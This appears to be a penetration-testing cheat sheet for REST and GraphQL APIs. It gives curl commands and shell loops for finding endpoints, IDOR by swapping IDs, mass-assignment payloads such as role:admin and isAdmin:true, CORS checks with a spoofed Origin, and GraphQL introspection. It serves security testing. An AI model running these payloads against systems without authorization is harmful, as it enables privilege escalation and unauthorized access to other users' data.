api::testing

web REST · GraphQL authz bypass
TriageRESTAuthGraphQLBug ClassesDecision TreeAutomation
01Triage
Initial recon
curl -i https://target/api/
curl -i -X OPTIONS https://target/api/users
curl -s https://target/openapi.json
curl -s https://target/swagger.json
curl -s https://target/api/docs

Check
- auth placement
- content-type
- method support
- CORS
- versioning
- errors / stack traces
Common endpoints
/api  /api/v1  /v1  /graphql
/openapi.json  /swagger  /swagger-ui
/docs  /redoc  /health  /metrics
Body templates
curl -i https://target/api/login   -H "Content-Type: application/json"   -d '{"username":"a","password":"b"}'

curl -i https://target/login   -H "Content-Type: application/x-www-form-urlencoded"   -d 'username=a&password=b'
02REST
Method confusion
Test GET / POST / PUT / PATCH / DELETE / OPTIONS

Example
curl -i -X PATCH https://target/api/user/1   -H "Content-Type: application/json"   -d '{"role":"admin"}'
IDOR
Swap:
- numeric IDs
- UUIDs
- org / tenant IDs
- order / invoice IDs

Watch:
- 403 vs 404 difference
- same schema for other users
- list endpoints returning extra data
Mass assignment
Try adding:
{"isAdmin":true}
{"role":"admin"}
{"verified":true}
{"ownerId":"2"}

Great targets:
- signup
- profile update
- team membership
- order creation
03Auth & CORS
Auth placement
Check:
- Cookie only
- Bearer only
- both accepted
- x-api-key
- token in query
- trust of x-user-id / x-role
CORS
curl -i https://target/api/me   -H "Origin: https://evil.example"

Look for:
Access-Control-Allow-Origin
Access-Control-Allow-Credentials
Access-Control-Allow-Headers

Bad signs:
- reflective Origin
- wildcard + sensitive data
04GraphQL
Discovery
/graphql  /api/graphql  /query

curl -s https://target/graphql   -H "Content-Type: application/json"   -d '{"query":"query{__typename}"}'
Introspection
curl -s https://target/graphql   -H "Content-Type: application/json"   -d '{"query":"{__schema{types{name fields{name}}}}"}' | jq

If blocked:
- inspect JS bundle
- use GraphQL errors
- fuzz common names: me, user, admin
GraphQL bug classes
- IDOR by resolver
- hidden fields via fragments
- batching / alias abuse
- expensive query DoS
- authZ mismatch between resolvers
- schema leakage through errors
05Bug Classes
IDOR
user/1 → user/2
invoice/100 → 101
Mass assignment
isAdmin
role
verified
ownerId
AuthZ drift
UI blocked
API still works
CORS
reflective Origin
wildcard + creds
Version drift
/v1 fixed
/v2 still broken
Debug leftovers
/openapi.json
/metrics
stack traces
06Decision Tree
What to test next?
Have endpoint but no docs?
  → OPTIONS, docs paths, JS bundle grep

Have token but little access?
  → IDOR, org / team / owner fields

JSON update endpoint?
  → mass assignment

GraphQL found?
  → __typename, introspection, schema hunting

Cross-origin behavior suspicious?
  → Origin + creds + preflight
07Automation
Docs probe
for p in /openapi.json /swagger.json /swagger /api/docs /redoc; do
  curl -skI https://target$p | head -n 1
done
JSON field fuzzing
jq '. + {"isAdmin":true,"role":"admin"}' body.json | curl -s https://target/api/profile     -H "Content-Type: application/json"     -d @-
GraphQL loop
for q in  'query{__typename}'  '{__schema{types{name}}}'  'query{me{id email}}'
do
  curl -s https://target/graphql     -H "Content-Type: application/json"     -d "{\"query\":\"$q\"}" | jq
done